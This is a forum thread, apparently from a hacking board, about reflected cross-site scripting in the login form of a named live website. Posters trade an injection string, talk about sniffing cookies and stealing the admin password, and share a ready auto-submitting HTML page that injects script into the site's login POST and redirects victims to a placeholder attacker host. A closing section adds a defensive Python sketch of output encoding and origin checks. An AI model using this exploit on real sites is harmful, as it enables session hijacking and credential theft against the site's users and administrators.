Well, if you try to put some string like this
Code:
"><script>alert(document.cookie)</script>
on nick+login on that site http://www.proplay.ru/
result:
Another site:
My question: do you think that can be exploitable?
I have found many sites vulnerable to XSS on admin (user) login, and I think that something can be done using some cookie sniffer. Thanks for your answer, Mr.NOmeR1 (you are right)
Even if the request method is POST, you can write a PHP script to post the data, and it will still be exploitable. If I am wrong, correct me =)
You can use POST (it will be better). You can get the admin's passwd (use JavaScript). Sorry for my English.
http://www.proplay.ru/
- method GET not supported
- no referer-control

http://yourhost.xz/g.html - link with XSS-exploit

file g.html
Code:
<body onload='document.forms[0].submit()'>
<form method="post" action="http://www.proplay.ru/users/login/">
<input name="name" value='"><script>alert(document.cookie);document.location.href=\"http://yourhost.xz/q.html\";</script>' style="visibility:hidden;display:none">
</form>

redirect -->> q.html with any content

Another site -->> by analogy
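
Added example, not part of the thread and not the site's code: a server-side sketch of the two controls the posts above find missing, encoding the reflected `name` value for its quoted attribute and refusing login POSTs that arrive from another origin. `SITE_HOST`, the function names and the header dictionaries are assumptions made for illustration.

```python
import html
from urllib.parse import urlsplit

SITE_HOST = "www.example.test"  # assumption: placeholder for the site's own host name

def same_site(headers):
    """Accept a login POST only if Origin (or, failing that, Referer) names our host."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False  # neither header present: refuse rather than guess
    return urlsplit(source).hostname == SITE_HOST

def render_login_form(submitted_name):
    """Re-display the login form with the submitted name encoded for a quoted attribute."""
    safe = html.escape(submitted_name, quote=True)  # & < > " ' become entities
    return ('<form method="post" action="/users/login/">'
            f'<input name="name" value="{safe}">'
            '</form>')

def handle_login_post(headers, form):
    """Return (status, body) for a failed login that echoes the name back."""
    if not same_site(headers):
        return 403, "cross-site form submission rejected"
    return 200, render_login_form(form.get("name", ""))

# Constructed sample input: the string from the first post, and request headers
# for a form auto-submitted from another origin, as in the last post.
SAMPLE_NAME = '"><script>alert(document.cookie)</script>'
CROSS_SITE = {"Origin": "http://yourhost.xz"}
SAME_SITE = {"Origin": "http://www.example.test"}

if __name__ == "__main__":
    print(handle_login_post(CROSS_SITE, {"name": SAMPLE_NAME}))
    print(handle_login_post(SAME_SITE, {"name": SAMPLE_NAME}))
```

The encoding is the actual fix for the reflection; the origin check only stops the form from being driven from a third-party page and does not replace it.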